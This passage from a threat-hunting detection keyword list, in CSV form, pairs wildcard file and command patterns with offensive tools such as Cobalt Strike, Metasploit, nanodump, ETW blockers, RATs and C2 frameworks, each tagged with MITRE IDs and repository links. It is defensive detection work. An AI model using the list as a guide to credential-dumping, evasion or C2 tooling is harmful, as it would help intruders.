proxychains - a tool that forces any TCP connection made by any given application to follow through proxy like TOR or any other SOCKS4 SOCKS5 or HTTP(S) proxy","T1090.004 - T1090.003 - T1027","TA0001 - TA0006 - TA0040","N/A","N/A","Exploitation tools","https://github.com/haad/proxychains","1","0","N/A","N/A","10","5489","586","2023-04-05T10:32:16Z","2011-02-25T12:27:05Z" +"*socks5_exe.exe*","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","10","10","430","66","2022-08-23T18:20:33Z","2021-01-26T22:56:50Z" +"*socks5h://127.0.0.1:9050*","offensive_tool_keyword","MaccaroniC2","A proof-of-concept Command & Control framework that utilizes the powerful AsyncSSH Python library which provides an asynchronous client and server implementation of the SSHv2 protocol and use PyNgrok wrapper for ngrok integration.","T1090 - T1059.003","TA0011 - TA0002","N/A","N/A","C2","https://github.com/CalfCrusher/MaccaroniC2","1","0","N/A","10","10","57","9","2023-06-27T17:43:59Z","2023-05-21T13:33:48Z" +"*socky whoami*","offensive_tool_keyword","cobaltstrike","Winsocket for Cobalt Strike.","T1572 - T1041 - T1105","TA0011 - TA0002 - TA0040","N/A","N/A","C2","https://github.com/WKL-Sec/Winsocky","1","1","N/A","10","10","80","13","2023-07-06T11:47:18Z","2023-06-22T07:00:22Z" +"*SOFTWARE\WOW6432Node\FreeFileSync*","greyware_tool_keyword","freefilesync","freefilesync is a backup and file synchronization program abused by attacker for data exfiltration","T1567.002 - T1020 - T1039","TA0010 ","N/A","N/A","Data Exfiltration","https://freefilesync.org/download.php","1","0","N/A","9","10","N/A","N/A","N/A","N/A" +"*Soledge/BlockEtw*","offensive_tool_keyword","BlockEtw",".Net Assembly to block ETW telemetry in current process","T1055.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/Soledge/BlockEtw","1","1","N/A","10","1","73","20","2020-05-14T19:24:49Z","2020-05-14T02:40:50Z" +"*solo_mine_example.cmd*","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","0","N/A","9","10","7770","3472","2023-09-29T12:15:29Z","2017-04-15T05:57:53Z" +"*souravbaghz/RadareEye*","offensive_tool_keyword","RadareEye","Tool for especially scanning nearby devices and execute a given command on its own system while the target device comes in range.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Network Exploitation tools","https://github.com/souravbaghz/RadareEye","1","1","N/A","N/A","4","338","50","2021-12-11T06:16:37Z","2021-01-07T04:52:58Z" +"*source/avetsvc.c*","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","10","10","1523","344","2023-03-24T16:50:08Z","2017-01-28T14:56:47Z" +"*source/byakugan*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*source/dllinject*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*source/flash_exploiter*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*source/javapayload*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*source/psh_exe*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*source/shtinkering.*","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1467","208","2023-09-04T01:25:27Z","2021-11-10T18:28:15Z" +"*Source\wdextract\*","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","N/A","8","4","347","56","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z" +"*Source\wdextract\zlib\dll_x64\zlibwapi.dll*","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","N/A","8","4","347","56","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z" +"*Source\wdextract\zlib\dll_x86\zlibwapi.dll*","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","N/A","8","4","347","56","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z" +"*Source\wdextract\zlib\lib\zlibwapi32.lib*","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","N/A","8","4","347","56","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z" +"*Source\wdextract\zlib\lib\zlibwapi64.lib*","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","N/A","8","4","347","56","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z" +"*SourcePoint*Loader.go*","offensive_tool_keyword","cobaltstrike","SourcePoint is a C2 profile generator for Cobalt Strike command and control servers designed to ensure evasion.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Tylous/SourcePoint","1","1","N/A","10","10","792","122","2022-11-17T01:04:04Z","2021-08-06T20:55:26Z" +"*source-teamserver.sh*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*spacerunner.exe -i *.ps1* -o *.exe*","offensive_tool_keyword","SpaceRunner","enables the compilation of a C# program that will execute arbitrary PowerShell code without launching PowerShell processes through the use of runspace.","T1059.001 - T1027","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Mr-B0b/SpaceRunner","1","0","N/A","7","2","185","38","2020-07-26T10:39:53Z","2020-07-26T09:31:09Z" +"*SpaceRunner-master.zip*","offensive_tool_keyword","SpaceRunner","enables the compilation of a C# program that will execute arbitrary PowerShell code without launching PowerShell processes through the use of runspace.","T1059.001 - T1027","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Mr-B0b/SpaceRunner","1","1","N/A","7","2","185","38","2020-07-26T10:39:53Z","2020-07-26T09:31:09Z" +"*SpamChannel-main.zip*","offensive_tool_keyword","SpamChannel","poof emails from any of the +2 Million domains using MailChannels","T1566 - T1566.001","TA0011","N/A","N/A","Sniffing & Spoofing","https://github.com/byt3bl33d3r/SpamChannel","1","1","N/A","8","3","257","28","2023-09-21T12:25:03Z","2022-12-20T21:31:55Z" +"*Spartacus.exe --mode proxy*","offensive_tool_keyword","Spartacus","Spartacus DLL/COM Hijacking Toolkit","T1574.001 - T1055.001 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/Accenture/Spartacus","1","0","N/A","10","9","826","104","2023-09-02T00:48:42Z","2022-10-28T09:00:35Z" +"*Spartacus-main.zip*","offensive_tool_keyword","Spartacus","Spartacus DLL/COM Hijacking Toolkit","T1574.001 - T1055.001 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/Accenture/Spartacus","1","1","N/A","10","9","826","104","2023-09-02T00:48:42Z","2022-10-28T09:00:35Z" +"*spartacus-proxy-*.log*","offensive_tool_keyword","Spartacus","Spartacus DLL/COM Hijacking Toolkit","T1574.001 - T1055.001 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/Accenture/Spartacus","1","0","N/A","10","9","826","104","2023-09-02T00:48:42Z","2022-10-28T09:00:35Z" +"*Spartacus-v2.*-x64.zip*","offensive_tool_keyword","Spartacus","Spartacus DLL/COM Hijacking Toolkit","T1574.001 - T1055.001 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/Accenture/Spartacus","1","1","N/A","10","9","826","104","2023-09-02T00:48:42Z","2022-10-28T09:00:35Z" +"*spartan-conseil/ratchatpt*","offensive_tool_keyword","ratchatgpt","ratchatpt a tool using openai api as a C2","T1094 - T1071.001","TA0011 - TA0002","N/A","N/A","C2","https://github.com/spartan-conseil/ratchatpt","1","1","N/A","10","10","4","2","2023-06-09T12:39:00Z","2023-06-09T09:19:10Z" +"*spartan-conseil/ratchatpt*","offensive_tool_keyword","ratchatpt","C2 using openAI API","T1094 - T1071.001","TA0011 - TA0002","N/A","N/A","C2","https://github.com/spartan-conseil/ratchatpt","1","1","risk of False positive","10","10","4","2","2023-06-09T12:39:00Z","2023-06-09T09:19:10Z" +"*spawn/runshellcode*","offensive_tool_keyword","cobaltstrike","CrossC2 developed based on the Cobalt Strike framework can be used for other cross-platform system control. CrossC2Kit provides some interfaces for users to call to manipulate the CrossC2 Beacon session. thereby extending the functionality of Cobalt Strike.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CrossC2/CrossC2Kit","1","1","N/A","10","10","155","25","2023-08-08T19:52:07Z","2022-06-06T07:00:10Z" +"*spawn_cmd.dll*","offensive_tool_keyword","POC","POC to check for CVE-2020-0796 /SMBGhost Expected outcome: cmd.exe launched with system access","T1210.001 - T1213 - T1212 - T1201","TA0007 - TA0002","N/A","N/A","Exploitation tools","https://github.com/ZecOps/CVE-2020-0796-LPE-POC","1","1","N/A","N/A","3","242","90","2020-04-02T08:01:38Z","2020-03-30T16:06:50Z" +"*spawnas * \ HACKER https*","offensive_tool_keyword","conti","Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies particularly those in North America. As with other ransomware families - actors using Conti steal sensitive files and information from compromised networks and threaten to publish this data unless the ransom is paid","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0003 - TA0004 - TA0007 - TA0009 - TA0040","Conti Ransomware","Wizard Spider","Ransomware","https://www.securonix.com/blog/on-conti-ransomware-tradecraft-detection/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*SpawnAsAgentManager.cs*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" +"*spawnasshellcode*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" +"*SpawnAsShellcodeManager*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" +"*SpawneRv6yTYhShell*","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","N/A","10","10","3255","534","2023-08-08T06:24:24Z","2022-10-25T22:02:59Z" +"*SpawnPPIDAgentManager*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" +"*SpawnShellcode.cs*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" +"*SpawnShellcodeManager*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" +"*SpawnTheThing(*","offensive_tool_keyword","cobaltstrike","EDR Evasion - Combination of SwampThing - TikiTorch","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rkervella/CarbonMonoxide","1","0","N/A","10","10","21","12","2020-05-28T10:40:20Z","2020-05-15T09:32:25Z" +"*spawnto *.exe","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" +"*spawnto */path *","offensive_tool_keyword","HardHatC2","A C# Command & Control framework","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","0","N/A","10","10","825","133","2023-09-06T05:17:05Z","2022-12-08T19:40:47Z" +"*spawnto_x64 -Application *","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1021 - T1021.002 - T1022 - T1032 - T1043 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Apollo/","1","0","N/A","10","10","401","83","2023-08-17T14:46:04Z","2020-11-09T08:05:16Z" +"*'spawnto_x64'*","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","421","96","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" +"*spawnto_x64.py*","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1021 - T1021.002 - T1022 - T1032 - T1043 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Apollo/","1","1","N/A","10","10","401","83","2023-08-17T14:46:04Z","2020-11-09T08:05:16Z" +"*spawnto_x86 -Application*","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1021 - T1021.002 - T1022 - T1032 - T1043 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Apollo/","1","0","N/A","10","10","401","83","2023-08-17T14:46:04Z","2020-11-09T08:05:16Z" +"*'spawnto_x86'*","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","421","96","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" +"*spawnto_x86.py*","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1021 - T1021.002 - T1022 - T1032 - T1043 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Apollo/","1","1","N/A","10","10","401","83","2023-08-17T14:46:04Z","2020-11-09T08:05:16Z" +"*specialtokengroupprivs.py*","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018","TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ","N/A","N/A","POST Exploitation 